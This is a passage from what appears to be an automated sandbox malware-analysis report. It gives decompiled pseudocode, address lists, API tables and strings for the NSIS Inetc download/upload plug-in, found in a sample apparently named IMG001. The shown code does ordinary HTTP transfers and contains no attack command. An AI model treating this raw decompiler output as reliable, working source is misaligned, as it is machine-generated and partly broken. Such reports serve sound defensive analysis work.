													}
													__eflags =  *0x73815ae8;
													if( *0x73815ae8 == 0) {
														_t282 = GetDlgItem(_a4, 0x3ed);
														SendDlgItemMessageA(_a4, 0x3ed, 0x402, 0, 0);
														__eflags =  *0x73815ac0 - 0xffffffff;
														_t260 =  !=  ? 0x73814150 : "Not Available";
														SetWindowTextA(GetDlgItem(_a4, 0x3ee),  !=  ? 0x73814150 : "Not Available");
														__eflags =  *0x73815ac0 - 0xffffffff;
														_t191 =  !=  ? 0x73814150 : "Unknown";
														SetWindowTextA(GetDlgItem(_a4, 0x3ec),  !=  ? 0x73814150 : "Unknown");
														__eflags =  *0x73815ac0 - 0xffffffff;
														_push(0xfffffff0);
														_push(_t282);
														if( *0x73815ac0 != 0xffffffff) {
															_t195 = GetWindowLongA() & 0xfffffff7;
															__eflags = _t195;
														} else {
															_t195 = GetWindowLongA() | 0x00000008;
														}
														SetWindowLongA(_t282, 0xfffffff0, _t195);
														__eflags =  *0x73815ac0 - 0xffffffff;
														SendDlgItemMessageA(_a4, 0x3ed, 0x40a, 0 |  *0x73815ac0 == 0xffffffff, 0x32);
														E7381148A(0x73814150, _v16, _t290);
														__eflags =  *0x73815adf;
														_pop(_t263);
														if( *0x73815adf != 0) {
															__eflags = _v100 - 1;
															if(_v100 != 1) {
																__eflags = 0;
																_v8 = HttpEndRequestA(_t290, 0, 0, 0);
																E73812E1F(_t263, _t290, 0, _t290);
															}
														}
														L51:
														InternetCloseHandle(_t290);
														_t280 = _v40;
														goto L52;
													}
													_v8 = 0x800;
													_t209 = HttpQueryInfoA(_t290, 0x16, 0x73817c30,  &_v8, 0);
													__eflags = _t209;
													if(_t209 == 0) {
														L44:
														 *0x73815ab4 =  *0x73815ab4 & 0x00000000;
														goto L51;
													}
													_t283 =  *0x73815ab0; // 0x314c168
													__eflags = _t283;
													if(_t283 == 0) {
														WriteFile(_v16, 0x73817c30, _v8,  &_v20, 0);
														goto L44;
													}
													_t265 =  *0x73815abc; // 0x0
													_t276 = 0;
													__eflags = _t265 -  *0x73818c38;
													if(_t265 >=  *0x73818c38) {
														goto L44;
													} else {
														goto L40;
													}
													while(1) {
														L40:
														__eflags = _t276 - _v8;
														if(_t276 >= _v8) {
															goto L44;
														}
														 *((char*)(_t265 + _t283)) =  *((intOrPtr*)(_t276 + 0x73817c30));
														_t266 =  *0x73815abc; // 0x0
														_t276 = _t276 + 1;
														_t265 = _t266 + 1;
														 *0x73815abc = _t265;
														__eflags = _t265 -  *0x73818c38;
														if(_t265 >=  *0x73818c38) {
															goto L44;
														}
														_t283 =  *0x73815ab0; // 0x314c168
													}
													goto L44;
												} else {
													__eflags = _t290;
													if(_t290 == 0) {
														L52:
														InternetCloseHandle(_t236);
														_t289 = _v36;
														_t238 = 1;
														goto L60;
													}
													InternetCloseHandle(_t290); // executed
													_t290 = 0;
													__eflags = 0;
													goto L35;
												}
											}
											L27:
											__eflags = 0;
											 *0x73815ab8 = 0;
											SetFilePointer(_v16, 0, 0, 0);
											_t248 = _v100;
											goto L28;
										}
										__eflags = _t248 - 1;
										if(_t248 != 1) {
											goto L27;
										}
										goto L26;
										L65:
										 *0x73815ab4 = 5;
										_t171 = SleepEx(0xbb8, _t170);
										_t234 = _v12;
										__eflags = _t171;
									} while (_t171 == 0);
									_t158 =  *0x73815ab4; // 0x4
									goto L67;
									L74:
									_t167 = SleepEx(0x3e8, _t166);
									_t234 = _v12;
									__eflags = _t167;
								} while (_t167 == 0);
							}
							goto L78;
						}
						_t269 =  *0x73815adf; // 0x0
						_t224 =  !=  ? 0x80000000 : 0x40000000;
						_t247 = CreateFileA(0x738156c8,  !=  ? 0x80000000 : 0x40000000, 1, 0, (0 | _t269 != 0x00000000) + 2, 0, 0);
						_v16 = _t247;
						__eflags = _t247 - 0xffffffff;
						if(_t247 != 0xffffffff) {
							goto L17;
						}
						 *0x73815ab4 = 0xb;
					}
					goto L84;
				}
			}

0x7381165d
0x7381166a
0x73811672
0x7381167c
0x73811688
0x7381168b
0x73811696
0x738116a2
0x738116a6
0x738116ad
0x738116b9
0x738116c2
0x738116c5
0x738116cb
0x738116ce
0x738116d1
0x738116d6
0x738116e1
0x738116e8
0x738116eb
0x738116ef
0x738116f2
0x738116f5
0x738116f8
0x738116fb
0x738116fe
0x73811701
0x73811704
0x7381170a
0x7381170c
0x73811711
0x73811dc6
0x00000000
0x73811717
0x73811717
0x73811726
0x7381173e
0x73811746
0x73811753
0x73811756
0x73811756
0x7381175f
0x7381176d
0x7381176d
0x73811777
0x73811783
0x73811783
0x7381178a
0x73811792
0x738117a4
0x738117a4
0x00000000
0x73811d7a
0x738117b9
0x738117bf
0x738117c1
0x73811d9d
0x73811d9e
0x73811db7
0x73811dbf
0x73811dbf
0x73811dd0
0x73811dd9
0x73811ddc
0x73811de1
0x73811de6
0x73811deb
0x73811dfb
0x73811e0c
0x73811e0c
0x73811e12
0x73811e18
0x73811e18
0x738117cc
0x738117d1
0x738117d3
0x00000000
0x00000000
0x738117e4
0x738117ea
0x738117ec
0x00000000
0x00000000
0x738117f5
0x738117fd
0x73811803
0x73811808
0x7381180b
0x73811811
0x7381181b
0x7381181d
0x73811823
0x73811829
0x7381182f
0x73811836
0x73811884
0x73811887
0x73811887
0x7381188e
0x73811893
0x73811896
0x73811899
0x7381189c
0x7381189f
0x738118a2
0x738118ad
0x738118ad
0x738118c0
0x738118c6
0x738118c8
0x73811d47
0x738118ce
0x738118ce
0x738118d1
0x738118d3
0x738118d6
0x738118d9
0x738118e7
0x73811903
0x73811908
0x7381190b
0x7381190b
0x738118d9
0x73811916
0x73811922
0x73811922
0x73811927
0x73811927
0x73811927
0x73811927
0x7381192e
0x73811931
0x73811938
0x73811938
0x7381193f
0x73811957
0x73811957
0x7381195c
0x73811961
0x73811963
0x7381196b
0x7381196e
0x73811974
0x73811975
0x73811977
0x7381197e
0x73811990
0x73811992
0x738119a0
0x738119a2
0x738119ad
0x738119b3
0x738119b5
0x738119b7
0x73811bb6
0x73811bb7
0x73811bc1
0x73811bc4
0x73811c23
0x73811c23
0x73811c29
0x73811c2c
0x73811c31
0x73811c3a
0x73811c41
0x73811c48
0x73811c4b
0x73811c50
0x73811c50
0x73811c57
0x73811c5e
0x73811c5e
0x73811c63
0x73811c66
0x00000000
0x00000000
0x73811c68
0x73811c6d
0x73811c70
0x73811ca7
0x73811ca7
0x73811cae
0x73811d53
0x73811d53
0x73811d56
0x73811d59
0x73811d5f
0x73811d66
0x00000000
0x00000000
0x73811d68
0x73811d6f
0x00000000
0x00000000
0x73811d71
0x73811d78
0x73811d9a
0x00000000
0x73811d9a
0x00000000
0x73811d78
0x73811cb4
0x73811cb6
0x00000000
0x00000000
0x73811cbc
0x73811cbf
0x00000000
0x00000000
0x73811cc5
0x73811cc8
0x00000000
0x00000000
0x73811cd9
0x73811cdb
0x73811cde
0x00000000
0x00000000
0x73811ce0
0x73811cf3
0x73811d06
0x73811d0c
0x73811d0f
0x00000000
0x00000000
0x73811d13
0x73811d16
0x73811d1c
0x73811d21
0x73811d28
0x73811d2a
0x73811d2c
0x00000000
0x00000000
0x00000000
0x73811d2c
0x73811c7f
0x73811c81
0x73811c83
0x00000000
0x00000000
0x00000000
0x73811c83
0x73811c59
0x73811c5c
0x00000000
0x00000000
0x00000000
0x73811c5c
0x73811c33
0x73811c38
0x00000000
0x00000000
0x00000000
0x73811c38
0x73811bd3
0x73811bda
0x73811be0
0x73811be2
0x00000000
0x00000000
0x73811bee
0x73811bf5
0x73811bf7
0x00000000
0x00000000
0x73811c03
0x73811c0d
0x73811c1b
0x00000000
0x73811c1b
0x738119c0
0x738119ca
0x738119cb
0x738119ce
0x738119da
0x738119dd
0x738119de
0x738119e3
0x738119d0
0x738119d0
0x738119d1
0x738119d7
0x738119e6
0x738119ed
0x738119ef
0x73811a02
0x73811a02
0x73811a04
0x00000000
0x00000000
0x73811a0a
0x73811a11
0x73811abe
0x73811ac0
0x73811ac6
0x73811ad7
0x73811aea
0x73811af0
0x73811b01
0x73811b14
0x73811b1a
0x73811b21
0x73811b23
0x73811b24
0x73811b37
0x73811b37
0x73811b26
0x73811b2c
0x73811b2c
0x73811b3e
0x73811b46
0x73811b60
0x73811b6a
0x73811b6f
0x73811b77
0x73811b78
0x73811b7d
0x73811b80
0x73811b82
0x73811b8f
0x73811b92
0x73811b97
0x73811b80
0x73811b98
0x73811b99
0x73811b9f
0x00000000
0x73811b9f
0x73811a25
0x73811a2c
0x73811a32
0x73811a34
0x73811a93
0x73811a93
0x00000000
0x73811a93
0x73811a36
0x73811a3c
0x73811a3e
0x73811a8d
0x00000000
0x73811a8d
0x73811a40
0x73811a46
0x73811a48
0x73811a4e
0x00000000
0x00000000
0x00000000
0x00000000
0x73811a50
0x73811a50
0x73811a50
0x73811a53
0x00000000
0x00000000
0x73811a5b
0x73811a5e
0x73811a64
0x73811a65
0x73811a66
0x73811a6c
0x73811a72
0x00000000
0x00000000
0x73811a74
0x73811a74
0x00000000
0x738119f1
0x738119f1
0x738119f3
0x73811ba2
0x73811ba3
0x73811ba9
0x73811bae
0x00000000
0x73811bae
0x738119fa
0x73811a00
0x73811a00
0x00000000
0x73811a00
0x738119ef
0x73811941
0x73811941
0x73811949
0x7381194e
0x73811954
0x00000000
0x73811954
0x73811933
0x73811936
0x00000000
0x00000000
0x00000000
0x73811c85
0x73811c8b
0x73811c95
0x73811c97
0x73811c9a
0x73811c9a
0x73811ca2
0x00000000
0x73811d2e
0x73811d34
0x73811d3a
0x73811d3d
0x73811d3d
0x73811d45
0x00000000
0x738118c8
0x73811838
0x7381185c
0x7381186b
0x7381186d
0x73811870
0x73811873
0x00000000
0x00000000
0x73811875
0x73811875
0x00000000
0x73811d8d

APIs

LocalAlloc.KERNEL32(00000040), ref: 73811674
LocalAlloc.KERNEL32(00000040), ref: 73811680
LocalAlloc.KERNEL32(00000040), ref: 7381168E
LocalAlloc.KERNEL32(00000040), ref: 7381169A
LocalAlloc.KERNEL32(00000040), ref: 738116A9
InternetOpenA.WININET(NSIS_Inetc (Mozilla),00000000,00000000), ref: 73811704
InternetQueryOptionA.WININET(00000000,00000032,00000000,?), ref: 7381172D
InternetSetOptionA.WININET(00000000,00000032,?,00000008), ref: 73811756
InternetSetOptionA.WININET(00000000,00000002,73815AC4,00000004), ref: 7381176B
InternetSetOptionA.WININET(00000000,00000006,73815AC8,00000004), ref: 73811783
LoadLibraryA.KERNEL32(wininet.dll), ref: 7381178A
GetProcAddress.KERNEL32(00000000,FtpCommandA), ref: 7381179E
lstrcmpiA.KERNEL32(/end), ref: 738117B9
lstrcmpiA.KERNEL32(/end,738156C8), ref: 738117E4
PostMessageA.USER32 ref: 73811829
CreateFileA.KERNEL32(738156C8,40000000,00000001,00000000,-00000002,00000000,00000000), ref: 73811865
GetFileSize.KERNEL32(00000000,00000000), ref: 738118A7

Part of subcall function 738126FC: HttpOpenRequestA.WININET(?,HEAD,00000000,00000000,00000000,00000000,00000000,00000000), ref: 7381275D
Part of subcall function 738126FC: wsprintfA.USER32 ref: 73812786
Part of subcall function 738126FC: HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 7381279E
Part of subcall function 738126FC: wsprintfA.USER32 ref: 738127B9
Part of subcall function 738126FC: HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 738127D1
Part of subcall function 738126FC: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 738127D8
Part of subcall function 738126FC: InternetReadFile.WININET(00000000,?,00000100,?), ref: 738127FE
Part of subcall function 738126FC: InternetErrorDlg.WININET(00000000,00002EEE,00000007,00000000), ref: 73812833

InternetCrackUrlA.WININET(00000000,00000000,0000003C), ref: 738118C0
wsprintfA.USER32 ref: 738118E7
lstrlenA.KERNEL32(73817C30,73817C30,73815B30), ref: 738118FC
lstrcatA.KERNEL32(00000000,?), ref: 73811916
GetTickCount.KERNEL32 ref: 7381191C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 7381194E
lstrlenA.KERNEL32(?,00000003,00000000,00000000), ref: 73811988
lstrlenA.KERNEL32(?,?), ref: 73811998
InternetConnectA.WININET(00000000,?,?,00000000), ref: 738119AD
InternetCloseHandle.WININET(00000000), ref: 738119FA
HttpQueryInfoA.WININET(00000000,00000016,73817C30,00000000,00000000), ref: 73811A2C
WriteFile.KERNEL32(00000000,73817C30,00000800,00000004,00000000), ref: 73811A8D
GetDlgItem.USER32 ref: 73811AA7
SendDlgItemMessageA.USER32(?,000003ED,00000402,00000000,00000000), ref: 73811AC0
GetDlgItem.USER32 ref: 73811AE3
SetWindowTextA.USER32(00000000), ref: 73811AEA
GetDlgItem.USER32 ref: 73811B0D
SetWindowTextA.USER32(00000000), ref: 73811B14
GetWindowLongA.USER32 ref: 73811B26
GetWindowLongA.USER32 ref: 73811B31
SetWindowLongA.USER32 ref: 73811B3E
SendDlgItemMessageA.USER32(?,000003ED,0000040A,00000000,00000032), ref: 73811B60
HttpEndRequestA.WININET(00000000,00000000,00000000,00000000), ref: 73811B88
InternetCloseHandle.WININET(00000000), ref: 73811B99
InternetCloseHandle.WININET(00000000), ref: 73811BA3
InternetGetLastResponseInfoA.WININET(?,73817C30,00000000), ref: 73811BDA
lstrcpynA.KERNEL32(-73814FFC,00000000,00000020), ref: 73811C1B
GetLastError.KERNEL32 ref: 73811C23
SleepEx.KERNEL32(000007D0,00000000), ref: 73811C7F
SleepEx.KERNEL32(00000BB8,00000000), ref: 73811C95
ShowWindow.USER32(?,00000000), ref: 73811CD9
GetParent.USER32(?), ref: 73811CFF
MessageBoxA.USER32 ref: 73811D06
ShowWindow.USER32(?,00000005), ref: 73811D28
SleepEx.KERNEL32(000003E8,00000000), ref: 73811D34
CloseHandle.KERNEL32(00000000), ref: 73811D59
DeleteFileA.KERNEL32(738156C8), ref: 73811D94
InternetCloseHandle.WININET(00000000), ref: 73811D9E
lstrcmpiA.KERNEL32(/end), ref: 73811DAF
LocalFree.KERNEL32(?), ref: 73811DD9
LocalFree.KERNEL32(00000000), ref: 73811DDC
LocalFree.KERNEL32(?), ref: 73811DE1
LocalFree.KERNEL32(?), ref: 73811DE6
LocalFree.KERNEL32(?), ref: 73811DEB
IsWindow.USER32(?), ref: 73811DF0
PostMessageA.USER32 ref: 73811E0C

Strings

<, xrefs: 738116E1
pvep, xrefs: 738117A4
NSIS_Inetc (Mozilla), xrefs: 738116DC
FtpCommandA, xrefs: 73811798
Your internet connection seems to be not permitted or dropped out!Please reconnect and click Retry to resume installation., xrefs: 73811CF7
/end, xrefs: 738117AE, 738117D9, 73811DA4
Unknown, xrefs: 73811AFC, 73811B04
Not Available, xrefs: 73811AD2, 73811ADA
530, xrefs: 73811BE4, 73811BF9
%s:%s, xrefs: 738118DD
wininet.dll, xrefs: 73811785
Inetc plug-in, xrefs: 73811CE9

Memory Dump Source

Source File: 00000006.00000002.517158202.0000000073811000.00000020.00020000.sdmp, Offset: 73810000, based on PE: true

Associated: 00000006.00000002.517148776.0000000073810000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.517168485.0000000073814000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.517176098.0000000073815000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.517187455.0000000073819000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_73810000_IMG001.jbxd

Similarity

API ID: Internet$Local$Window$FileHttp$AllocCloseFreeHandleItemMessageRequest$Option$LongSendSleeplstrcmpilstrlenwsprintf$ErrorHeadersInfoLastOpenPostQueryShowText$AddressConnectCountCrackCreateDeleteLibraryLoadParentPointerProcReadResponseSizeTickWritelstrcatlstrcpyn
String ID: %s:%s$/end$530$<$FtpCommandA$Inetc plug-in$NSIS_Inetc (Mozilla)$Not Available$Unknown$Your internet connection seems to be not permitted or dropped out!Please reconnect and click Retry to resume installation.$pvep$wininet.dll
API String ID: 208045817-3393542543
Opcode ID: 0dd260306810cbbf36016db4fa8dbd1d8fdf201f60ca451565ee2af57017061d
Instruction ID: 26beff85ce18c952ffcd34151e931c293a3646a800803de5142fd0fb8f878b5b
Opcode Fuzzy Hash: 0dd260306810cbbf36016db4fa8dbd1d8fdf201f60ca451565ee2af57017061d
Instruction Fuzzy Hash: 052292B294071AEFDB51AFE6CC49B6E7BBAEB04305F38411DE51AE7180E7704950CB50

Uniqueness

Uniqueness Score: -1.00%

Function 738126FC, Relevance: 61.6, APIs: 28, Strings: 7, Instructions: 369
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E738126FC(void* __ecx, void* __eflags, void* _a4, intOrPtr _a8, char* _a12) {
				long _v8;
				long _v12;
				char _v267;
				char _v268;
				void* __esi;
				void* _t61;
				char* _t62;
				long _t63;
				long _t64;
				long _t66;
				long _t67;
				long _t68;
				int _t71;
				long _t74;
				long _t75;
				int _t100;
				long _t106;
				int _t109;
				int _t112;
				int _t117;
				PVOID* _t126;
				void* _t136;
				long _t142;
				void* _t143;
				void* _t146;
				void* _t147;
				void* _t150;
				void* _t153;
				void* _t154;
				void* _t158;

				_t126 = 0;
				_v268 = 0;
				E73811000( &_v267, 0, 0xff);
				_t147 = _t146 + 0xc;
				_t139 = "HEAD";
				_t150 =  *0x73815adf - _t126; // 0x0
				if(_t150 == 0) {
					_t143 = _v12;
					L33:
					__eflags =  *0x73815ab4 - 4;
					if( *0x73815ab4 != 4) {
						L69:
						return _t143;
					}
					__eflags = _a8 - 4;
					_t131 =  ==  ? 0x80c180 : 0;
					__eflags =  *0x73815add; // 0x0
					_t54 =  !=  ? 0x4080000 : 0;
					_t132 = ( ==  ? 0x80c180 : 0) | ( !=  ? 0x4080000 : 0);
					__eflags =  *0x73815ab8; // 0x0
					_t56 =  !=  ? 0 : 0x80000000;
					_t133 = ( ==  ? 0x80c180 : 0) | ( !=  ? 0x4080000 : 0) | ( !=  ? 0 : 0x80000000);
					_t134 = ( ==  ? 0x80c180 : 0) | ( !=  ? 0x4080000 : 0) | ( !=  ? 0 : 0x80000000) | 0x00400000;
					__eflags =  *0x738157e4; // 0x0
					_t58 =  ==  ? 0 : "POST";
					__eflags =  *0x73815ae8; // 0x0
					_t140 =  ==  ?  ==  ? 0 : "POST" : _t139;
					__eflags =  *0x73815adf; // 0x0
					_t60 =  ==  ?  ==  ?  ==  ? 0 : "POST" : _t139 : "PUT";
					_t61 = HttpOpenRequestA(_a4,  ==  ?  ==  ?  ==  ? 0 : "POST" : _t139 : "PUT", _a12, _t126, _t126, _t126, ( ==  ? 0x80c180 : 0) | ( !=  ? 0x4080000 : 0) | ( !=  ? 0 : 0x80000000) | 0x00400000, _t126); // executed
					_t143 = _t61;
					__eflags = _t143;
					if(_t143 == 0) {
						 *0x73815ab4 = 0x10;
						goto L69;
					}
					__eflags =  *0x73815bb0;
					if( *0x73815bb0 != 0) {
						wsprintfA( &_v268, "Proxy-authorization: basic %s", 0x73815bb0);
						_t147 = _t147 + 0xc;
						HttpAddRequestHeadersA(_t143,  &_v268, 0xffffffff, 0xa0000000);
					}
					__eflags =  *0x738157e4;
					if( *0x738157e4 != 0) {
						HttpAddRequestHeadersA(_t143, "Content-Type: application/x-www-form-urlencoded", 0xffffffff, 0xa0000000);
					}
					__eflags =  *0x738159a8;
					if( *0x738159a8 != 0) {
						HttpAddRequestHeadersA(_t143, 0x738159a8, 0xffffffff, 0xa0000000);
					}
					_t62 =  *0x738157d8; // 0x0
					__eflags = _t62;
					if(_t62 != 0) {
						HttpAddRequestHeadersA(_t143, _t62, 0xffffffff, 0xa0000000);
					}
					__eflags =  *0x73815b30;
					if( *0x73815b30 != 0) {
						wsprintfA( &_v268, "Authorization: basic %s", 0x73815b30);
						_t147 = _t147 + 0xc;
						HttpAddRequestHeadersA(_t143,  &_v268, 0xffffffff, 0xa0000000);
					}
					__eflags =  *0x73815adf;
					if( *0x73815adf != 0) {
						wsprintfA( &_v268, "Content-Type: octet-stream\nContent-Length: %d",  *0x73815ac0);
						HttpAddRequestHeadersA(_t143,  &_v268, 0xffffffff, 0xa0000000);
					}
					_t142 = 4;
					while(1) {
						__eflags = _a8 - _t142;
						if(_a8 != _t142) {
							goto L51;
						}
						_t75 = E73811E1B(_t143);
						_pop(_t136);
						__eflags = _t75;
						if(_t75 != 0) {
							L52:
							__eflags =  *0x73815adf;
							if(__eflags != 0) {
								goto L69;
							}
							E73812E1F(_t136, _t143, __eflags, _t143);
							__eflags =  *0x73815ad8;
							_t66 =  *0x73815ab4; // 0x4
							if( *0x73815ad8 != 0) {
								L59:
								__eflags = _t66 - _t142;
								if(_t66 == _t142) {
									_t67 =  *0x73815ab8; // 0x0
									_push(_t126);
									__eflags = _t67;
									if(_t67 != 0) {
										_t68 = InternetSetFilePointer(_t143, _t67, _t126, _t126, ??);
										__eflags = _t68 - 0xffffffff;
										if(_t68 == 0xffffffff) {
											 *0x73815ab4 = 0xe;
										}
									} else {
										_v8 = 0x100;
										_t71 = HttpQueryInfoA(_t143, 5,  &_v268,  &_v8, ??);
										__eflags = _t71;
										if(_t71 == 0) {
											 *0x73815ac0 =  *0x73815ac0 | 0xffffffff;
										} else {
											 *0x73815ac0 = E73813B34( &_v268);
										}
									}
								}
								goto L69;
							}
							__eflags = _t66 - 0x15;
							if(_t66 == 0x15) {
								L56:
								_t74 = InternetErrorDlg( *0x73815ae4, _t143, 0x2eee, 7, _t126);
								_v8 = _t74;
								__eflags = _t74 - 0x2f00;
								if(_t74 != 0x2f00) {
									_t66 = 3;
									 *0x73815ab4 = _t66;
									goto L59;
								}
								 *0x73815ab4 = _t142;
								continue;
							}
							__eflags = _t66 - 0x1a;
							if(_t66 != 0x1a) {
								goto L59;
							}
							goto L56;
						}
						_v12 = _t142;
						InternetQueryOptionA(_t143, 0x1f,  &_v8,  &_v12);
						_t41 =  &_v8;
						 *_t41 = _v8 | 0x00000180;
						__eflags =  *_t41;
						InternetSetOptionA(_t143, 0x1f,  &_v8, _t142);
						L51:
						_t63 = E73811E1B(_t143);
						_pop(_t136);
						__eflags = _t63;
						if(__eflags == 0) {
							_t64 = E73812E1F(_t136, _t143, __eflags, _t143);
							__eflags = _t64;
							if(_t64 == 0) {
								 *0x73815ab4 = 0x11;
							}
							goto L69;
						}
						goto L52;
					}
				}
				_t97 =  !=  ? 0x4080000 : 0;
				_t98 = ( !=  ? 0x4080000 : 0) | 0x80400000;
				_t143 = HttpOpenRequestA(_a4, "HEAD", _a12, 0, 0, 0, ( !=  ? 0x4080000 : 0) | 0x80400000, 0);
				if(_t143 == 0) {
					 *0x73815ab4 = 0x10;
					goto L29;
				} else {
					_t153 =  *0x73815bb0 - _t126; // 0x0
					if(_t153 != 0) {
						wsprintfA( &_v268, "Proxy-authorization: basic %s", 0x73815bb0);
						_t147 = _t147 + 0xc;
						HttpAddRequestHeadersA(_t143,  &_v268, 0xffffffff, 0xa0000000);
					}
					_t154 =  *0x73815b30 - _t126; // 0x0
					if(_t154 != 0) {
						wsprintfA( &_v268, "Authorization: basic %s", 0x73815b30);
						_t147 = _t147 + 0xc;
						HttpAddRequestHeadersA(_t143,  &_v268, 0xffffffff, 0xa0000000);
					}
					while(1) {
						_t100 = HttpSendRequestA(_t143, _t126, _t126, _t126, _t126);
						_t155 = _t100;
						if(_t100 == 0) {
							break;
						} else {
							E73812E1F(0x4080000, _t143, _t155, _t143);
							_pop(0x4080000);
							goto L8;
						}
						do {
							L8:
						} while (InternetReadFile(_t143,  &_v268, 0x100,  &_v8) != 0 && _v8 > _t126);
						_t106 =  *0x73815ab4; // 0x4
						_t158 =  *0x73815ad8 - _t126; // 0x1
						if(_t158 != 0 || _t106 != 0x15 && _t106 != 0x1a) {
							L16:
							__eflags = _t106 - 0x13;
							if(_t106 == 0x13) {
								L19:
								_t106 = 4;
								 *0x73815ab4 = _t106;
								L20:
								__eflags = _t106 - 4;
								if(_t106 == 4) {
									_v268 = _t126;
									_v8 = 0x100;
									_t109 = HttpQueryInfoA(_t143, 0x1c,  &_v268,  &_v8, _t126);
									__eflags = _t109;
									if(_t109 != 0) {
										__eflags = _v268;
										if(_v268 != 0) {
											lstrcpynA(0x73815b30,  &_v268, _v8);
										}
									}
									_v268 = 0;
									_v8 = 0x100;
									_t112 = HttpQueryInfoA(_t143, 0x3d,  &_v268,  &_v8, 0);
									__eflags = _t112;
									if(_t112 != 0) {
										__eflags = _v268;
										if(_v268 != 0) {
											lstrcpynA(0x73815bb0,  &_v268, _v8);
										}
									}
									_t126 = 0;
									__eflags = 0;
								}
								L28:
								InternetCloseHandle(_t143);
								L29:
								_t139 = "HEAD";
								goto L33;
							}
							__eflags = _t106 - 0x16;
							if(_t106 == 0x16) {
								goto L19;
							}
							__eflags = _t106 - 0x17;
							if(_t106 != 0x17) {
								goto L20;
							}
							goto L19;
						} else {
							_t117 = InternetErrorDlg( *0x73815ae4, _t143, 0x2eee, 7, _t126);
							_v8 = _t117;
							if(_t117 != 0x2f00) {
								_t106 = 3;
								 *0x73815ab4 = _t106;
								goto L16;
							} else {
								 *0x73815ab4 = 4;
								continue;
							}
						}
					}
					 *0x73815ab4 = 0x11;
					goto L28;
				}
			}

0x73812708
0x73812717
0x7381271d
0x73812728
0x73812730
0x73812735
0x7381273b
0x73812927
0x7381292a
0x7381292a
0x73812931
0x73812bc6
0x73812bcb
0x73812bcb
0x73812939
0x73812942
0x73812947
0x73812952
0x73812955
0x73812959
0x73812965
0x73812968
0x7381296a
0x73812973
0x7381297f
0x73812982
0x73812989
0x7381298c
0x7381299b
0x738129a2
0x738129a8
0x738129aa
0x738129ac
0x73812bbb
0x00000000
0x73812bbb
0x738129b2
0x738129b9
0x738129cc
0x738129d2
0x738129e4
0x738129e4
0x738129e6
0x738129ed
0x738129fc
0x738129fc
0x738129fe
0x73812a05
0x73812a14
0x73812a14
0x73812a16
0x73812a1b
0x73812a1d
0x73812a28
0x73812a28
0x73812a2a
0x73812a31
0x73812a44
0x73812a4a
0x73812a5c
0x73812a5c
0x73812a5e
0x73812a65
0x73812a79
0x73812a91
0x73812a91
0x73812a95
0x73812a96
0x73812a96
0x73812a99
0x00000000
0x00000000
0x73812a9c
0x73812aa1
0x73812aa2
0x73812aa4
0x73812ade
0x73812ade
0x73812ae5
0x00000000
0x00000000
0x73812aec
0x73812af1
0x73812af8
0x73812afe
0x73812b3c
0x73812b3c
0x73812b3e
0x73812b44
0x73812b49
0x73812b4a
0x73812b4c
0x73812b8d
0x73812b93
0x73812b96
0x73812b98
0x73812b98
0x73812b4e
0x73812b5c
0x73812b63
0x73812b69
0x73812b6b
0x73812b80
0x73812b6d
0x73812b79
0x73812b79
0x73812b6b
0x73812b4c
0x00000000
0x73812b3e
0x73812b00
0x73812b03
0x73812b0a
0x73812b19
0x73812b1f
0x73812b22
0x73812b27
0x73812b36
0x73812b37
0x00000000
0x73812b37
0x73812b29
0x00000000
0x73812b29
0x73812b05
0x73812b08
0x00000000
0x00000000
0x00000000
0x73812b08
0x73812ab1
0x73812ab4
0x73812aba
0x73812aba
0x73812aba
0x73812ac9
0x73812acf
0x73812ad0
0x73812ad5
0x73812ad6
0x73812ad8
0x73812ba5
0x73812bab
0x73812bad
0x73812baf
0x73812baf
0x00000000
0x73812bad
0x00000000
0x73812ad8
0x73812a96
0x7381274a
0x7381274d
0x73812763
0x73812767
0x7381291b
0x00000000
0x7381276d
0x7381276d
0x73812773
0x73812786
0x7381278c
0x7381279e
0x7381279e
0x738127a0
0x738127a6
0x738127b9
0x738127bf
0x738127d1
0x738127d1
0x738127d3
0x738127d8
0x738127de
0x738127e0
0x00000000
0x738127e6
0x738127e7
0x738127ec
0x738127ec
0x738127ec
0x738127ed
0x738127ed
0x73812804
0x7381280d
0x73812812
0x73812818
0x73812857
0x73812857
0x7381285a
0x73812866
0x73812868
0x73812869
0x7381286e
0x7381286e
0x73812871
0x73812886
0x7381288c
0x73812893
0x7381289f
0x738128a1
0x738128a3
0x738128aa
0x738128bb
0x738128bb
0x738128aa
0x738128cd
0x738128d4
0x738128db
0x738128e1
0x738128e3
0x738128e5
0x738128ec
0x738128fd
0x738128fd
0x738128ec
0x738128ff
0x738128ff
0x738128ff
0x73812901
0x73812902
0x73812908
0x73812908
0x00000000
0x73812908
0x7381285c
0x7381285f
0x00000000
0x00000000
0x73812861
0x73812864
0x00000000
0x00000000
0x00000000
0x73812824
0x73812833
0x73812839
0x73812841
0x73812851
0x73812852
0x00000000
0x73812843
0x73812843
0x00000000
0x73812843
0x73812841
0x73812818
0x7381290f
0x00000000
0x7381290f

APIs

HttpOpenRequestA.WININET(?,HEAD,00000000,00000000,00000000,00000000,00000000,00000000), ref: 7381275D
wsprintfA.USER32 ref: 73812786
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 7381279E
wsprintfA.USER32 ref: 738127B9
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 738127D1
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 738127D8
InternetReadFile.WININET(00000000,?,00000100,?), ref: 738127FE
InternetErrorDlg.WININET(00000000,00002EEE,00000007,00000000), ref: 73812833
HttpQueryInfoA.WININET(00000000,0000001C,?,?,00000000), ref: 73812893
lstrcpynA.KERNEL32(73815B30,00000000,00000100), ref: 738128BB
HttpQueryInfoA.WININET(00000000,0000003D,?,00000100,00000000), ref: 738128DB
lstrcpynA.KERNEL32(73815BB0,00000000,00000100), ref: 738128FD
InternetCloseHandle.WININET(00000000), ref: 73812902
HttpOpenRequestA.WININET(?,PUT,00000000,00000000,00000000,00000000,00000000,00000000), ref: 738129A2
wsprintfA.USER32 ref: 738129CC
